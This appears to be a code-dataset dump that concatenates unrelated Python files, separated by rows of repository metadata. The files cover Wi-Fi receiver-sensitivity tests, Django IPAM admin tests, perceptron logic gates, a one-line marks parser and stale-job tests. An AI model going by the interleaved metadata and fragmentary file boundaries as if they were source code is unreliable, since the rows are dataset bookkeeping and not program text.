        self.assertEqual(len(set([lines[13], lines[15]])), 2)
# Allow this test module to be run directly as a script.
if __name__ == '__main__':
    unittest.main()
| 40.003543
| 79
| 0.601563
| 5,099
| 45,164
| 5.171014
| 0.071387
| 0.115902
| 0.10991
| 0.020897
| 0.840824
| 0.783555
| 0.750446
| 0.72678
| 0.699473
| 0.685402
| 0
| 0.015976
| 0.287641
| 45,164
| 1,128
| 80
| 40.039007
| 0.803562
| 0.074373
| 0
| 0.698558
| 0
| 0
| 0.12928
| 0.025323
| 0
| 0
| 0
| 0
| 0.359109
| 1
| 0.044561
| false
| 0.077326
| 0.007864
| 0
| 0.061599
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
b9b9e611841345fc2a9c6ae2251ade1b1108d04e
| 7,237
|
py
|
Python
|
tests/e2e/advanced/receiver_sensitivity/test_nat_mode_all_mcs.py
|
DYeag/wlan-testing
|
81e879d04ea3c6a55d14a330d461d8914507e3b2
|
[
"BSD-3-Clause"
] | 7
|
2020-08-19T16:45:46.000Z
|
2022-02-10T09:55:22.000Z
|
tests/e2e/advanced/receiver_sensitivity/test_nat_mode_all_mcs.py
|
DYeag/wlan-testing
|
81e879d04ea3c6a55d14a330d461d8914507e3b2
|
[
"BSD-3-Clause"
] | 47
|
2020-12-20T16:06:03.000Z
|
2022-03-23T03:01:22.000Z
|
tests/e2e/advanced/receiver_sensitivity/test_nat_mode_all_mcs.py
|
DYeag/wlan-testing
|
81e879d04ea3c6a55d14a330d461d8914507e3b2
|
[
"BSD-3-Clause"
] | 9
|
2021-02-04T22:32:06.000Z
|
2021-12-14T17:45:51.000Z
|
"""
Performance Test: Receiver Sensitivity Test: NAT Mode
pytest -m "rx_sensitivity_test and nat"
"""
import os
import pytest
import allure
# Suite-level pytest marks applied to every test collected from this
# module, plus the per-run setup fixture.
pytestmark = [pytest.mark.rx_sensitivity_test, pytest.mark.nat,
              pytest.mark.usefixtures("setup_test_run")]

# AP / radio profile consumed (indirectly) by the setup_profiles fixture:
# NAT mode, one WPA2-personal SSID per band, 20 MHz channel width on all
# 5 GHz sub-bands, RADIUS disabled.
setup_params_general = {
    "mode": "NAT",
    "ssid_modes": {
        "wpa2_personal": [
            {"ssid_name": "ssid_wpa2_2g", "appliedRadios": ["is2dot4GHz"], "security_key": "something"},
            {"ssid_name": "ssid_wpa2_5g", "appliedRadios": ["is5GHzU", "is5GHz", "is5GHzL"],
             "security_key": "something"}]},
    "rf": {
        "is5GHz": {"channelBandwidth": "is20MHz"},
        "is5GHzL": {"channelBandwidth": "is20MHz"},
        "is5GHzU": {"channelBandwidth": "is20MHz"}},
    "radius": False,
    # Identifiers of the programmable attenuators in the testbed,
    # passed through to the LANforge raw_lines config below.
    "attenuator": {
        "attenuator": "1.1.3059",
        "attenuator2": "1.1.3034"}
}
@allure.feature("NAT MODE CLIENT CONNECTIVITY")
@pytest.mark.parametrize(
    'setup_profiles',
    [setup_params_general],
    indirect=True,
    scope="class"
)
@pytest.mark.usefixtures("setup_profiles")
class TestRxSensitivityNATAllMcs5G(object):
    """Receiver sensitivity tests (all MCS rates) for NAT-mode SSIDs."""

    @staticmethod
    def _build_raw_lines(attenuator, attenuator2):
        """Return the LANforge rx-sensitivity raw_lines configuration.

        Shared by the 2.4 GHz and 5 GHz tests; only the attenuator
        identifiers vary per testbed.
        """
        return [
            ['txo_preamble: VHT'],
            # Fix: the original implicit string concatenation was missing
            # the ';' between '...3 CCK, OFDM, HT, VHT' and '4 OFDM...',
            # merging two MCS entries into 'VHT4 OFDM'. A ';' is added so
            # each MCS index 0-9 is a separate entry.
            ['txo_mcs: 0 CCK, OFDM, HT, VHT;1 CCK, OFDM, HT, VHT;2 CCK, OFDM, HT, VHT;3 CCK, OFDM, HT, VHT;'
             '4 OFDM, HT, VHT;5 OFDM, HT, VHT;6 OFDM, HT, VHT;7 OFDM, HT, VHT;8 VHT;9 VHT'],
            ['spatial_streams: 1'], ['bandw_options: 20'], ['txo_sgi: OFF'],
            ['txo_retries: No Retry'],
            ['attenuator: %s' % attenuator],
            ['attenuator2: %s' % attenuator2],
            ["show_3s: 1"], ['txo_txpower: 17'],
            ["show_ll_graphs: 1"], ["show_log: 1"]]

    def _run_rx_sensitivity(self, get_vif_state, lf_test, station_names,
                            dut_name, get_configuration, profile_index,
                            band, instance_name):
        """Connect a client and run one rx-sensitivity dataplane test.

        Private helper factoring out the body previously duplicated in
        the 2G and 5G test methods. Xfails when the SSID is absent from
        the VIF state; attaches the generated PDF report (if any) to the
        allure results; asserts the client station connected.
        """
        profile_data = \
            setup_params_general["ssid_modes"]["wpa2_personal"][profile_index]
        ssid_name = profile_data["ssid_name"]
        security_key = profile_data["security_key"]
        security = "wpa2"
        mode = "NAT"
        vlan = 1

        raw_lines = self._build_raw_lines(
            setup_params_general["attenuator"]["attenuator"],
            setup_params_general["attenuator"]["attenuator2"])

        if ssid_name not in get_vif_state:
            allure.attach(name="retest,vif state ssid not available:",
                          body=str(get_vif_state))
            pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")

        station = lf_test.Client_Connect(ssid=ssid_name, security=security,
                                         passkey=security_key, mode=mode,
                                         band=band,
                                         station_name=station_names,
                                         vlan_id=vlan)
        if station:
            dp_obj = lf_test.rx_sensitivity(station_name=station_names,
                                            mode=mode,
                                            instance_name=instance_name,
                                            vlan_id=vlan, dut_name=dut_name,
                                            raw_lines=raw_lines)

            # Report directory name is the last path component of the
            # ':::'-delimited response of the last command.
            report_name = dp_obj.report_name[0]['LAST']["response"] \
                .split(":::")[1].split("/")[-1]

            pdf = False
            for entry in os.listdir("../reports/" + report_name + '/'):
                if ".pdf" in entry:
                    pdf = entry
            if pdf:
                allure.attach.file(
                    source="../reports/" + report_name + "/" + pdf,
                    name=get_configuration["access_point"][0]["model"] + "_dataplane")

            print("Test Completed... Cleaning up Stations")
            lf_test.Client_disconnect(station_name=station_names)
            assert station
        else:
            assert False

    @allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-2445", name="WIFI-2445")
    @pytest.mark.wpa2_personal
    @pytest.mark.fiveg
    @pytest.mark.all_mcs
    def test_client_wpa2_personal_nat_all_mcs_5g(self, get_vif_state,
                                                 lf_test, station_names_fiveg,
                                                 create_lanforge_chamberview_dut,
                                                 get_configuration):
        """Receiver Sensitivity nat Mode
        pytest -m "rx_sensitivity_test and nat and wpa2_personal and fiveg"
        """
        self._run_rx_sensitivity(
            get_vif_state, lf_test, station_names_fiveg,
            create_lanforge_chamberview_dut, get_configuration,
            profile_index=1, band="fiveg",
            instance_name="TIP_PERF_RX_SEN_WPA2_NAT_5G_ALL_MCS")

    @allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-2445", name="WIFI-2445")
    @pytest.mark.wpa2_personal
    @pytest.mark.twog
    @pytest.mark.all_mcs
    def test_client_wpa2_personal_nat_all_mcs_2g(self, get_vif_state,
                                                 lf_test, station_names_twog,
                                                 create_lanforge_chamberview_dut,
                                                 get_configuration):
        """Receiver Sensitivity nat Mode
        pytest -m "rx_sensitivity_test and nat and wpa2_personal and twog"
        """
        self._run_rx_sensitivity(
            get_vif_state, lf_test, station_names_twog,
            create_lanforge_chamberview_dut, get_configuration,
            profile_index=0, band="twog",
            instance_name="TIP_PERF_RX_SEN_WPA2_NAT_2G_ALL_MCS")
| 48.898649
| 116
| 0.566948
| 817
| 7,237
| 4.755202
| 0.19951
| 0.02471
| 0.037066
| 0.02471
| 0.818018
| 0.796654
| 0.796654
| 0.796654
| 0.779665
| 0.744402
| 0
| 0.02459
| 0.30883
| 7,237
| 147
| 117
| 49.231293
| 0.752099
| 0.039796
| 0
| 0.619048
| 0
| 0.031746
| 0.262462
| 0.010173
| 0
| 0
| 0
| 0
| 0.031746
| 1
| 0.015873
| false
| 0.015873
| 0.02381
| 0
| 0.047619
| 0.015873
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b9df18e613e01c34032da89f9650086a269cb026
| 11,206
|
py
|
Python
|
django_ipam/tests/base/test_admin.py
|
pawelplsi/django-ipam
|
bb8cf38883aa6bd05af34134542671b50d616a62
|
[
"BSD-3-Clause"
] | null | null | null |
django_ipam/tests/base/test_admin.py
|
pawelplsi/django-ipam
|
bb8cf38883aa6bd05af34134542671b50d616a62
|
[
"BSD-3-Clause"
] | null | null | null |
django_ipam/tests/base/test_admin.py
|
pawelplsi/django-ipam
|
bb8cf38883aa6bd05af34134542671b50d616a62
|
[
"BSD-3-Clause"
] | null | null | null |
import json
from django.contrib.auth import get_user_model
from django.core.files.uploadedfile import SimpleUploadedFile
from django.urls import reverse
# Resolve the active user model once so the tests honour any
# AUTH_USER_MODEL override in the test settings.
User = get_user_model()
class BaseTestAdmin(object):
def setUp(self):
    """Create a superuser and authenticate the test client with it."""
    credentials = {'username': 'admin', 'password': 'tester'}
    User.objects.create_superuser(email='admin@admin.com', **credentials)
    self.client.login(**credentials)
def test_ipaddress_invalid_entry(self):
subnet = self._create_subnet(subnet='10.0.0.0/24', description='Sample Subnet')
post_data = self._post_data(ip_address='1234',
subnet=str(subnet.id),
created_0='2017-08-08',
created_1='15:16:10',
modified_0='2017-08-08',
modified_1='15:16:10')
response = self.client.post(reverse('admin:{0}_ipaddress_add'.format(self.app_name)),
json.loads(post_data), follow=True)
self.assertContains(response, 'ok')
self.assertContains(response, 'Enter a valid IPv4 or IPv6 address.')
def test_ipaddress_change(self):
subnet = self._create_subnet(subnet='10.0.0.0/24', description='Sample Subnet')
obj = self._create_ipaddress(ip_address='10.0.0.1', subnet=subnet)
response = self.client.get(reverse('admin:{0}_ipaddress_change'.format(self.app_name), args=[obj.pk]),
follow=True)
self.assertContains(response, 'ok')
self.assertEqual(self.ipaddress_model.objects.get(pk=obj.pk).ip_address, '10.0.0.1')
def test_ipv4_subnet_change(self):
subnet = self._create_subnet(subnet='10.0.0.0/24', description='Sample Subnet')
self._create_ipaddress(ip_address='10.0.0.1', subnet=subnet)
url = reverse('admin:{0}_subnet_change'.format(self.app_name), args=[subnet.pk])
response = self.client.get(url)
self.assertContains(response, 'ok')
self.assertContains(response, '<h3>Subnet Visual Display</h3>')
def test_ipv6_subnet_change(self):
subnet = self._create_subnet(subnet='fdb6:21b:a477::9f7/64', description='Sample Subnet')
self._create_ipaddress(ip_address='fdb6:21b:a477::9f7', subnet=subnet)
response = self.client.get(reverse('admin:{0}_subnet_change'.format(self.app_name), args=[subnet.pk]),
follow=True)
self.assertContains(response, 'ok')
self.assertContains(response, '<h3>Subnet Visual Display</h3>')
def test_subnet_invalid_entry(self):
post_data = self._post_data(subnet=1234,
created_0='2017-08-08',
created_1='15:16:10',
modified_0='2017-08-08',
modified_1='15:16:10')
response = self.client.post(reverse('admin:{0}_subnet_add'.format(self.app_name)),
json.loads(post_data), follow=True)
self.assertContains(response, 'ok')
self.assertContains(response, 'Enter a valid CIDR address.')
def test_subnet_popup_response(self):
subnet = self._create_subnet(subnet='fdb6:21b:a477::9f7/64', description='Sample Subnet')
self._create_ipaddress(ip_address='fdb6:21b:a477::9f7', subnet=subnet)
response = self.client.get(reverse('admin:{0}_subnet_change'.format(self.app_name),
args=[subnet.id]) + '?_popup=1',
follow=True)
self.assertContains(response, 'ok')
def test_ipaddress_response(self):
subnet = self._create_subnet(subnet='10.0.0.0/24', description='Sample Subnet')
post_data = self._post_data(ip_address='10.0.0.1',
subnet=str(subnet.id),
created_0='2017-08-08',
created_1='15:16:10',
modified_0='2017-08-08',
modified_1='15:16:10')
response = self.client.post(reverse('admin:{0}_ipaddress_add'.format(self.app_name)),
json.loads(post_data), follow=True)
self.assertContains(response, 'ok')
def test_ipaddress_popup_response(self):
subnet = self._create_subnet(subnet='10.0.0.0/24', description='Sample Subnet')
post_data = self._post_data(ip_address='10.0.0.1',
subnet=str(subnet.id),
created_0='2017-08-08',
created_1='15:16:10',
modified_0='2017-08-08',
modified_1='15:16:10',
_popup=1)
response = self.client.post(reverse('admin:{0}_ipaddress_add'.format(self.app_name)),
json.loads(post_data))
self.assertContains(response, 'opener.dismissAddAnotherPopup(window);')
def test_csv_upload(self):
csv_data = """Monachers - Matera,
10.27.1.0/24,
,
ip address,description
10.27.1.1,Monachers
10.27.1.252,NanoStation M5
10.27.1.253,NanoStation M5
10.27.1.254,Nano Beam 5 19AC"""
csvfile = SimpleUploadedFile('data.csv', bytes(csv_data, 'utf-8'))
response = self.client.post(reverse('admin:ipam_import_subnet'.format(self.app_name)),
{'csvfile': csvfile}, follow=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(str(self.subnet_model.objects.first().subnet), '10.27.1.0/24')
self.assertEqual(str(self.ipaddress_model.objects.all()[0].ip_address), '10.27.1.1')
self.assertEqual(str(self.ipaddress_model.objects.all()[1].ip_address), '10.27.1.252')
self.assertEqual(str(self.ipaddress_model.objects.all()[2].ip_address), '10.27.1.253')
self.assertEqual(str(self.ipaddress_model.objects.all()[3].ip_address), '10.27.1.254')
def test_existing_csv_data(self):
subnet = self._create_subnet(name='Monachers - Matera', subnet='10.27.1.0/24')
self._create_ipaddress(ip_address='10.27.1.1', subnet=subnet, description='Monachers')
csv_data = """Monachers - Matera,
10.27.1.0/24,
,
ip address,description
10.27.1.1,Monachers
10.27.1.252,NanoStation M5
10.27.1.253,NanoStation M5
10.27.1.254,Nano Beam 5 19AC"""
csvfile = SimpleUploadedFile('data.csv', bytes(csv_data, 'utf-8'))
response = self.client.post(reverse('admin:ipam_import_subnet'.format(self.app_name)),
{'csvfile': csvfile}, follow=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(str(self.ipaddress_model.objects.all()[1].ip_address), '10.27.1.252')
self.assertEqual(str(self.ipaddress_model.objects.all()[2].ip_address), '10.27.1.253')
self.assertEqual(str(self.ipaddress_model.objects.all()[3].ip_address), '10.27.1.254')
def test_invalid_file_type(self):
csv_data = """Monachers - Matera,
10.27.1.0/24,
,
ip address,description
10.27.1.1,Monachers
10.27.1.252,NanoStation M5
10.27.1.253,NanoStation M5
10.27.1.254,Nano Beam 5 19AC"""
csvfile = SimpleUploadedFile('data.txt', bytes(csv_data, 'utf-8'))
response = self.client.post(reverse('admin:ipam_import_subnet'.format(self.app_name)),
{'csvfile': csvfile}, follow=True)
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'File type not supported.')
def test_invalid_subnet_csv_data(self):
csv_data = """Monachers - Matera,
12324324,
,
ip address,description
10.27.1.1,Monachers
NanoStation M5
10.27.1.253,NanoStation M5
10.27.1.254,Nano Beam 5 19AC"""
csvfile = SimpleUploadedFile('data.csv', bytes(csv_data, 'utf-8'))
response = self.client.post(reverse('admin:ipam_import_subnet'.format(self.app_name)),
{'csvfile': csvfile}, follow=True)
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'does not appear to be an IPv4 or IPv6 network')
def test_invalid_ipaddress_csv_data(self):
csv_data = """Monachers - Matera,
10.27.1.0/24,
,
ip address,description
10123142131,Monachers
10.27.1.252,NanoStation M5
10.27.1.253,NanoStation M5
10.27.1.254,Nano Beam 5 19AC"""
csvfile = SimpleUploadedFile('data.csv', bytes(csv_data, 'utf-8'))
response = self.client.post(reverse('admin:ipam_import_subnet'.format(self.app_name)),
{'csvfile': csvfile}, follow=True)
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'does not appear to be an IPv4 or IPv6 address')
def test_subnet_csv_export(self):
subnet = self._create_subnet(subnet='10.0.0.0/24', name='Sample Subnet')
self._create_ipaddress(ip_address='10.0.0.1', subnet=subnet, description='Testing')
self._create_ipaddress(ip_address='10.0.0.2', subnet=subnet, description='Testing')
self._create_ipaddress(ip_address='10.0.0.3', subnet=subnet)
self._create_ipaddress(ip_address='10.0.0.4', subnet=subnet)
csv_data = """Sample Subnet\r
10.0.0.0/24\r
\r
ip_address,description\r
10.0.0.1,Testing\r
10.0.0.2,Testing\r
10.0.0.3,\r
10.0.0.4,\r
"""
csv_data = bytes(csv_data.replace(' ', ''), 'utf-8')
url = reverse('admin:ipam_export_subnet', args=[subnet.id])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, csv_data)
def test_importcsv_form(self):
response = self.client.get(reverse('admin:ipam_import_subnet'))
self.assertEqual(response.status_code, 200)
def test_hierarchy_tree(self):
subnet_root = self._create_subnet(subnet='11.0.0.0/23', name='Root')
subnet_child = self._create_subnet(subnet='11.0.0.0/24', name='Child#1', master_subnet=subnet_root)
self._create_subnet(subnet='11.0.1.0/24', name='Child#2', master_subnet=subnet_root)
self._create_subnet(subnet='11.0.0.0/25', name='Grantchild#1', master_subnet=subnet_child)
url = reverse('admin:{0}_subnet_change'.format(self.app_name), args=[subnet_child.id])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertContains(response, "11.0.0.0/23 (Root)")
self.assertContains(response, "11.0.0.0/24 (Child#1)")
self.assertContains(response, "11.0.1.0/24 (Child#2)")
self.assertContains(response, "11.0.0.0/25 (Grantchild#1)")
| 50.477477
| 110
| 0.597359
| 1,430
| 11,206
| 4.516783
| 0.103497
| 0.012076
| 0.024772
| 0.036848
| 0.82954
| 0.806317
| 0.77272
| 0.7512
| 0.72039
| 0.693451
| 0
| 0.08462
| 0.266018
| 11,206
| 221
| 111
| 50.705882
| 0.700669
| 0
| 0
| 0.558376
| 0
| 0
| 0.254685
| 0.061306
| 0
| 0
| 0
| 0
| 0.187817
| 1
| 0.086294
| false
| 0.010152
| 0.055838
| 0
| 0.147208
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6a361906320586374b2352e3c987520069dcef6e
| 168
|
py
|
Python
|
pageNotFound/views.py
|
loribonna/EsameLDPython
|
02f671d0813e4e3cfed5a977018ab295b8675d60
|
[
"MIT"
] | null | null | null |
pageNotFound/views.py
|
loribonna/EsameLDPython
|
02f671d0813e4e3cfed5a977018ab295b8675d60
|
[
"MIT"
] | null | null | null |
pageNotFound/views.py
|
loribonna/EsameLDPython
|
02f671d0813e4e3cfed5a977018ab295b8675d60
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def pageNotFound(request):
    """Catch-all view that reports a missing page.

    Fix: the original returned a default HTTP 200, so clients and crawlers
    treated missing pages as existing ones; a not-found response must carry
    status 404.  (Presumably this view is wired up as the app's 404
    handler — confirm against the URL configuration.)
    """
    return HttpResponse("Page Not Found", status=404)
| 28
| 41
| 0.797619
| 22
| 168
| 6.090909
| 0.818182
| 0.149254
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136905
| 168
| 6
| 41
| 28
| 0.924138
| 0.136905
| 0
| 0
| 0
| 0
| 0.097222
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
6a49339a8e8db8543bca1cf7dffdecc3019230cd
| 534
|
py
|
Python
|
DeepLearning from Scratch 1/ch2/2.3.3 가중치와 편향 구현하기.py
|
DaeSeokSong/HobbyCoding
|
662f348442a953316347dc2fb31df1a852ac12f3
|
[
"MIT"
] | null | null | null |
DeepLearning from Scratch 1/ch2/2.3.3 가중치와 편향 구현하기.py
|
DaeSeokSong/HobbyCoding
|
662f348442a953316347dc2fb31df1a852ac12f3
|
[
"MIT"
] | null | null | null |
DeepLearning from Scratch 1/ch2/2.3.3 가중치와 편향 구현하기.py
|
DaeSeokSong/HobbyCoding
|
662f348442a953316347dc2fb31df1a852ac12f3
|
[
"MIT"
] | null | null | null |
"""2.3.3 가중치와 편향 구현하기"""
def AND(x1, x2):
    """Perceptron AND gate: returns 1 only when both inputs are 1.

    Fix: this file never imports numpy, so the original ``np.*`` calls
    raised NameError at call time; the two-element weighted sum is computed
    with plain arithmetic instead (identical result).
    """
    w1, w2, b = 0.5, 0.5, -0.7  # weights and bias
    tmp = w1 * x1 + w2 * x2 + b
    return 0 if tmp <= 0 else 1
def NAND(x1, x2):
    """Perceptron NAND gate: returns 0 only when both inputs are 1.

    AND and NAND differ only in their weights (w) and bias (b).

    Fix: this file never imports numpy, so the original ``np.*`` calls
    raised NameError at call time; the weighted sum is computed with plain
    arithmetic instead (identical result).
    """
    w1, w2, b = -0.5, -0.5, 0.7  # negated AND weights and bias
    tmp = w1 * x1 + w2 * x2 + b
    return 0 if tmp <= 0 else 1
def OR(x1, x2):
    """Perceptron OR gate: returns 1 when at least one input is 1.

    Fix: this file never imports numpy, so the original ``np.*`` calls
    raised NameError at call time; the weighted sum is computed with plain
    arithmetic instead (identical result).
    """
    w1, w2, b = 0.5, 0.5, -0.2  # smaller bias than AND, so one input suffices
    tmp = w1 * x1 + w2 * x2 + b
    return 0 if tmp <= 0 else 1
| 18.413793
| 31
| 0.464419
| 112
| 534
| 2.214286
| 0.276786
| 0.096774
| 0.060484
| 0.084677
| 0.818548
| 0.818548
| 0.818548
| 0.754032
| 0.754032
| 0.754032
| 0
| 0.116992
| 0.327715
| 534
| 29
| 32
| 18.413793
| 0.573816
| 0.08427
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
e038a6a1f22093556aceeb486188267d48bccf43
| 321
|
py
|
Python
|
CA117/Lab_4/beststudent_31_v2.py
|
PRITI1999/OneLineWonders
|
91a7368e0796e5a3b5839c9165f9fbe5460879f5
|
[
"MIT"
] | 6
|
2016-02-04T00:15:20.000Z
|
2019-10-13T13:53:16.000Z
|
CA117/Lab_4/beststudent_31_v2.py
|
PRITI1999/OneLineWonders
|
91a7368e0796e5a3b5839c9165f9fbe5460879f5
|
[
"MIT"
] | 2
|
2016-03-14T04:01:36.000Z
|
2019-10-16T12:45:34.000Z
|
CA117/Lab_4/beststudent_31_v2.py
|
PRITI1999/OneLineWonders
|
91a7368e0796e5a3b5839c9165f9fbe5460879f5
|
[
"MIT"
] | 10
|
2016-02-09T14:38:32.000Z
|
2021-05-25T08:16:26.000Z
|
# Deliberate one-liner (repo "OneLineWonders") — kept as-is.
# Behavior: takes a filename from sys.argv[1]; each line of the file is
# expected to look like "<mark> <first-name> <last-name>".  If the file
# exists, prints the line with the highest integer mark as
# "Best student: <first> <last>" / "Best mark: <mark>"; if a mark is not
# all digits, prints "Invalid mark ... Exiting" and exits; if the file is
# missing, prints "ERROR: File not found! <name>".
# NOTE(review): the key function abuses a list literal for side effects
# ([print(...), exit()]) to bail out mid-max(); exit() comes from the
# `site` module and may be absent when run with python -S.
(lambda a:print("Best student: {1} {2}\nBest mark: {0}".format(*max([line.split()for line in open(a,'r')],key=lambda x:int(x[0]) if x[0].isdigit() else [print("Invalid mark %s encountered. Exiting" % x[0]), exit()])))if __import__('os').path.isfile(a)else print("ERROR: File not found! " + a))(__import__('sys').argv[1])
| 160.5
| 320
| 0.65109
| 57
| 321
| 3.526316
| 0.684211
| 0.029851
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.024055
| 0.093458
| 321
| 1
| 321
| 321
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0.317757
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 6
|
e050ad968c3072ad9c1330031f17b3893a3b8ba5
| 231
|
py
|
Python
|
terrafirma/planner/apps.py
|
AlexandraAlter/django-terrafirma
|
afce5946f173aded2b4bfea78cf1b1034ec32272
|
[
"MIT"
] | null | null | null |
terrafirma/planner/apps.py
|
AlexandraAlter/django-terrafirma
|
afce5946f173aded2b4bfea78cf1b1034ec32272
|
[
"MIT"
] | null | null | null |
terrafirma/planner/apps.py
|
AlexandraAlter/django-terrafirma
|
afce5946f173aded2b4bfea78cf1b1034ec32272
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
from django.utils.translation import gettext_lazy as _
class PlannerConfig(AppConfig):
    """Django application configuration for the Terrafirma planner app."""

    # Full dotted import path of the app package.
    name = 'terrafirma.planner'
    # Explicit label so it cannot clash with another app named "planner".
    label = 'terrafirma_planner'
    # Human-readable name, marked for translation.
    verbose_name = _('Terrafirma Planner')
| 25.666667
| 54
| 0.766234
| 26
| 231
| 6.615385
| 0.653846
| 0.296512
| 0.244186
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.155844
| 231
| 8
| 55
| 28.875
| 0.882051
| 0
| 0
| 0
| 0
| 0
| 0.233766
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0ebd3478de83e65bc3ea2a9c82dd1c79bf67e25e
| 2,513
|
py
|
Python
|
tests/meltano/core/job/test_stale_job_failer.py
|
siilats/meltano
|
404605c83f441c3fc2b729e26416c6caa8b0ed0b
|
[
"MIT"
] | 122
|
2021-06-21T17:30:29.000Z
|
2022-03-25T06:21:38.000Z
|
tests/meltano/core/job/test_stale_job_failer.py
|
siilats/meltano
|
404605c83f441c3fc2b729e26416c6caa8b0ed0b
|
[
"MIT"
] | null | null | null |
tests/meltano/core/job/test_stale_job_failer.py
|
siilats/meltano
|
404605c83f441c3fc2b729e26416c6caa8b0ed0b
|
[
"MIT"
] | 21
|
2021-06-22T10:08:15.000Z
|
2022-03-18T08:57:02.000Z
|
from datetime import datetime, timedelta
import pytest
from meltano.core.job import Job
from meltano.core.job.stale_job_failer import StaleJobFailer
class TestStaleJobFailer:
    """Tests for StaleJobFailer: stale running jobs must be marked failed.

    "Stale" is simulated by back-dating a running job's ``last_heartbeat_at``
    by 10 minutes; fresh and completed jobs must be left untouched.
    """

    @pytest.fixture
    def live_job(self, session):
        # Running job with a fresh heartbeat — must NOT be failed.
        job = Job(job_id="test")
        job.start()
        job.save(session)
        return job

    @pytest.fixture
    def stale_job(self, session):
        # Running job whose heartbeat is 10 minutes old — considered stale.
        job = Job(job_id="test")
        job.start()
        job.last_heartbeat_at = datetime.utcnow() - timedelta(minutes=10)
        job.save(session)
        return job

    @pytest.fixture
    def other_stale_job(self, session):
        # Second stale job under a different job_id ("other") — used to
        # verify the job_id filter in the second test.
        job = Job(job_id="other")
        job.start()
        job.last_heartbeat_at = datetime.utcnow() - timedelta(minutes=10)
        job.save(session)
        return job

    @pytest.fixture
    def complete_job(self, session):
        # Successfully finished job — must never be touched by the failer.
        job = Job(job_id="other")
        job.start()
        job.success()
        job.save(session)
        return job

    def test_fail_stale_jobs(
        self, live_job, stale_job, other_stale_job, complete_job, session
    ):
        """Without a job_id filter, every stale job is failed."""
        assert stale_job.is_stale()
        assert other_stale_job.is_stale()
        failer = StaleJobFailer()
        failer.fail_stale_jobs(session)
        # Re-read persisted state after the failer has run.
        session.refresh(live_job)
        session.refresh(stale_job)
        session.refresh(other_stale_job)
        session.refresh(complete_job)
        # Leaves non-stale jobs alone
        assert live_job.is_running()
        assert complete_job.is_complete()
        # Marks all stale jobs as failed
        assert stale_job.has_error()
        assert not stale_job.is_stale()
        assert other_stale_job.has_error()
        assert not other_stale_job.is_stale()

    def test_fail_stale_jobs_with_job_id(
        self, live_job, stale_job, other_stale_job, complete_job, session
    ):
        """With a job_id filter, only stale jobs with that ID are failed."""
        assert stale_job.is_stale()
        assert other_stale_job.is_stale()
        failer = StaleJobFailer(job_id=stale_job.job_id)
        failer.fail_stale_jobs(session)
        # Re-read persisted state after the failer has run.
        session.refresh(live_job)
        session.refresh(stale_job)
        session.refresh(other_stale_job)
        session.refresh(complete_job)
        # Leaves non-stale jobs alone
        assert live_job.is_running()
        assert complete_job.is_complete()
        # Marks stale jobs with the job ID as failed
        assert stale_job.has_error()
        assert not stale_job.is_stale()
